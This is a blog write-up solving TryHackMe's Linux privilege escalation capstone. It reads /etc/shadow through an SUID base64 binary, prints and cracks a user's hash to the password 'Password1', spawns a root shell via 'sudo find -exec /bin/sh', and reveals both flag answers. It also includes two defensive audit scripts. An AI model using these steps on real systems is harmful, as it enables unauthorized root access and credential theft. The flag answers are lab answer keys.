TryHackMe - Linux Privilege Escalation: Capstone Challenge

Niccolo Lampa

This article discusses the solution to the tasks in TryHackMe's Linux Privilege Escalation Kernel Capstone Challenge, so proceed with caution (spoilers ahead).

I would suggest that you try to solve it on your own, as you will learn a lot in the process of attempting it. Give it your all until you feel that you are really, hopelessly stuck.

Linux Privilege Escalation: Capstone Challenge Solution

What is the content of the flag1.txt file?

  1. Let's first gather some information about the machine:

history
whoami
uname -a
uname -r
cat /proc/version
cat /etc/issue
ps
sudo -l
ls
id
ifconfig
netstat -a
netstat -at
netstat -au
netstat -l
env
  2. Let's go to /home, where we discover two other users, missy and rootflag. From the history we know that flag2.txt is in rootflag's home directory, so chances are that flag1.txt is in /home/missy.


  3. Let's first check whether there is a kernel exploit.


Let's take a quick look for a kernel exploit for version 3.10.0-1160.el7.x86_64.

  4. Let's check for sudo rights with sudo -l. Unfortunately, leonard has no sudo rights.

  5. Check for SUID binaries.

find / -type f -perm -04000 -ls 2>/dev/null


Several binaries have the SUID bit set. Let's check https://gtfobins.github.io/#+suid to see whether any of them can be abused for root access.

We can use the SUID base64 to read /etc/passwd and /etc/shadow and find information about user missy. Unfortunately, these files contain no entry for rootflag.

LFILE=/etc/passwd
base64 "$LFILE" | base64 --decode

missy:x:1001:1001::/home/missy:/bin/bash

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::

  6. Let's try cracking missy's password. Create local files passwd.txt and shadow.txt and paste in the contents retrieved from the target machine.

  7. Unshadow the files:

unshadow passwd.txt shadow.txt > passwords.txt

  8. Run John the Ripper on passwords.txt, which reveals that missy's password is Password1:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

  9. Now, on the target machine, switch user to missy with the password Password1:

su missy
cd /home/missy/Documents
cat flag1.txt
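From a defender's side, the shadow line we just cracked is worth reading field by field. The following POSIX sh check is an added example written for this write-up (it is not part of the room or the original post): it parses /etc/shadow lines from stdin and reports, per account, the hash algorithm and the findings a password audit cares about (empty password, weak hash scheme, no password expiry). The sample input is constructed: missy's real line from above plus two made-up accounts with a constructed md5crypt hash and an empty password.

```shell
#!/bin/sh
# Added example for this write-up: audit /etc/shadow entries read from stdin.
# Not from the room or the post; the sample data below is constructed.

# Map the crypt(3) id prefix of a hash field to a scheme name. A hash with no
# "$" prefix is traditional DES crypt; "!" or "*" means the account is locked.
hash_algo() {
    case "$1" in
        '')        echo "empty" ;;
        '!'*|'*'*) echo "locked" ;;
        '$6$'*)    echo "sha512crypt" ;;
        '$5$'*)    echo "sha256crypt" ;;
        '$y$'*)    echo "yescrypt" ;;
        '$1$'*)    echo "md5crypt" ;;
        '$'*)      echo "unknown" ;;
        *)         echo "descrypt" ;;
    esac
}

# Read shadow lines (user:hash:lastchg:min:max:warn:inactive:expire:reserved)
# on stdin and print "user algorithm findings" for each account.
shadow_audit() {
    while IFS=: read -r user hash lastchg min max warn inact expire rest; do
        [ -n "$user" ] || continue
        algo=$(hash_algo "$hash")
        findings=""
        case $algo in
            empty)             findings="$findings no-password" ;;
            descrypt|md5crypt) findings="$findings weak-hash" ;;
        esac
        # A max age of 99999 (or blank) means the password never expires.
        case $max in
            ''|99999) [ "$algo" != locked ] && findings="$findings no-expiry" ;;
        esac
        printf '%s %s%s\n' "$user" "$algo" "$findings"
    done
    return 0
}

# Constructed sample: missy's line from this write-up, plus two made-up
# accounts (svc with a constructed md5crypt hash, guest with no password).
SAMPLE_SHADOW='missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
svc:$1$abcdefgh$constructedmd5hashXXXXXXXXXX:18785:0:90:7:::
guest::18785:0:99999:7:::'

# Usage on a live host (needs root to read the file): shadow_audit < /etc/shadow
```

Note that missy's hash is sha512crypt, a strong scheme, and it still fell to john in seconds because Password1 is in rockyou.txt. A hash-scheme check like this one catches the weakest configurations, but it is no substitute for a password policy and a periodic crack of your own shadow file.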


Answer: THM-42828719920544

What is the content of the flag2.txt file?

  1. Continuing from what we have done above, the current user is now missy. Let's check her privileges by running sudo -l

  2. We find out that user missy has sudo privileges for find. Looking at https://gtfobins.github.io/#+sudo, we discover that there is a sudo entry for the find binary.

  3. Let's execute what we have found in GTFObins which will spawn a terminal with root privileges.

sudo find . -exec /bin/sh \; -quit
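Both footholds in this room, the SUID base64 from step 5 and missy's sudo rule for find, are the kind of thing an administrator can catch before an attacker does. The POSIX sh audit below is an added example written for this write-up (not from the room or the post): it matches SUID file paths and sudoers rules against a watchlist of binaries known to spawn a shell or read arbitrary files. The watchlist is a constructed two-entry list made from the binaries abused here; a real audit would load the full GTFOBins index. The sample inputs are also constructed.

```shell
#!/bin/sh
# Added audit helper for this write-up (not part of the room or the post).
# Flags SUID binaries and sudoers rules that grant a watchlisted command.
# The watchlist is a constructed, deliberately short list built from the two
# binaries abused in this write-up; a real audit would use the GTFOBins index.
WATCHLIST="base64 find"

# Return 0 if the command name in $1 (a basename) is on the watchlist.
on_watchlist() {
    for w in $WATCHLIST; do
        [ "$w" = "$1" ] && return 0
    done
    return 1
}

# Read SUID file paths on stdin (the output of: find / -type f -perm -04000)
# and print those whose basename is on the watchlist.
flag_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        on_watchlist "$(basename "$path")" && printf '%s\n' "$path"
    done
    return 0
}

# Read sudoers-style rules on stdin ("user host=(runas) [NOPASSWD:] cmd, cmd")
# and print each rule that grants ALL or a watchlisted command.
flag_sudo() {
    while IFS= read -r rule; do
        case $rule in ''|'#'*) continue ;; esac
        cmds=${rule#*=}                                # drop "user host="
        case $cmds in '('*) cmds=${cmds#*)} ;; esac    # drop "(runas)"
        cmds=$(printf '%s' "$cmds" | sed 's/[A-Z]*PASSWD://g; s/,/ /g')
        hit=0
        for c in $cmds; do
            [ "$c" = ALL ] && hit=1
            on_watchlist "$(basename "$c")" && hit=1
        done
        [ "$hit" -eq 1 ] && printf '%s\n' "$rule"
    done
    return 0
}

# Constructed sample inputs: a few SUID paths of the kind the find command in
# step 5 lists, and sudoers rules including the one missy has in this room.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/base64
/usr/bin/sudo'
SAMPLE_SUDO='missy ALL=(ALL) /usr/bin/find
bob ALL=(ALL) NOPASSWD: /usr/sbin/reboot'

# Usage on a live host (not run here):
#   find / -type f -perm -04000 2>/dev/null | flag_suid
#   cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | flag_sudo
```

Any hit from flag_suid is a candidate for chmod u-s, and any hit from flag_sudo is a rule to rewrite with a wrapper script or a narrower command; both would have closed the paths used in this challenge.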


  4. Now let's read the content of flag2.txt, which is found in /home/rootflag.


Answer: THM-168824782390238

Until next time. Keep learning.

Stay stoked and code. :)


I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)
